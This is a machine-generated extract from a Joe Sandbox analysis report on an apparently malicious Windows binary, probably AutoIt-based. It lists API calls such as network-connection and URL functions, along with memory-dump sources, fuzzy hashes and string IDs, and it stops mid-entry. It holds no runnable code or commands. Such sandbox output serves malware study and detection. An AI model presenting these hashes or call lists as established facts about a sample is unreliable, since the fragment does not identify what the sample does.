                                                                                                  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                                                • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                                • __freeptd.LIBCMT ref: 0041516B
                                                                                                • ExitThread.KERNEL32 ref: 00415173
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                                • String ID:
                                                                                                • API String ID: 1454798553-0
                                                                                                • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                                                • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strncmp
                                                                                                • String ID: Q\E
                                                                                                • API String ID: 909875538-2189900498
                                                                                                • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                                                • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: U$\
                                                                                                • API String ID: 4104443479-100911408
                                                                                                • Opcode ID: 835b85672203460d32fbae7ee09f86de6f9ff03da8fa91cdddc3cb8863709e71
                                                                                                • Instruction ID: 856fd8c118fd9d88a35ce60e305a75550171e0483a96a15f1a05c3eab080688b
                                                                                                • Opcode Fuzzy Hash: 835b85672203460d32fbae7ee09f86de6f9ff03da8fa91cdddc3cb8863709e71
                                                                                                • Instruction Fuzzy Hash: D2C1B070E002499FEF14CF69C4907AEFBF2AF85304F2881AED451A7341D739A946CB55
                                                                                                APIs
                                                                                                • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                                                • String ID: AutoIt3GUI$Container
                                                                                                • API String ID: 2652923123-3941886329
                                                                                                • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                                • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove_strncmp
                                                                                                • String ID: U$\
                                                                                                • API String ID: 2666721431-100911408
                                                                                                • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                                                • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                                                APIs
                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                • __wcsnicmp.LIBCMT ref: 00467288
                                                                                                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                • String ID: LPT
                                                                                                • API String ID: 3035604524-1350329615
                                                                                                • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                                • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                                                • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                                • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: \$h
                                                                                                • API String ID: 4104443479-677774858
                                                                                                • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                                                • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memcmp
                                                                                                • String ID: &
                                                                                                • API String ID: 2931989736-1010288
                                                                                                • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                                • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: \
                                                                                                • API String ID: 4104443479-2967466578
                                                                                                • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                                                • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 00466825
                                                                                                • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CrackInternet_wcslen
                                                                                                • String ID: |
                                                                                                • API String ID: 596671847-2343686810
                                                                                                • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                                                • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: '
                                                                                                • API String ID: 3850602802-1997036262
                                                                                                • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                                APIs
                                                                                                • _strlen.LIBCMT ref: 0040F858
                                                                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                                • _sprintf.LIBCMT ref: 0040F9AE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove$_sprintf_strlen
                                                                                                • String ID: %02X
                                                                                                • API String ID: 1921645428-436463671
                                                                                                • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                                • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: Combobox
                                                                                                • API String ID: 3850602802-2096851135
                                                                                                • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                APIs
                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                • String ID: edit
                                                                                                • API String ID: 2978978980-2167791130
                                                                                                • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                • String ID: @
                                                                                                • API String ID: 2783356886-2766056989
                                                                                                • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                                • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: htonsinet_addr
                                                                                                • String ID: 255.255.255.255
                                                                                                • API String ID: 3832099526-2422070025
                                                                                                • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
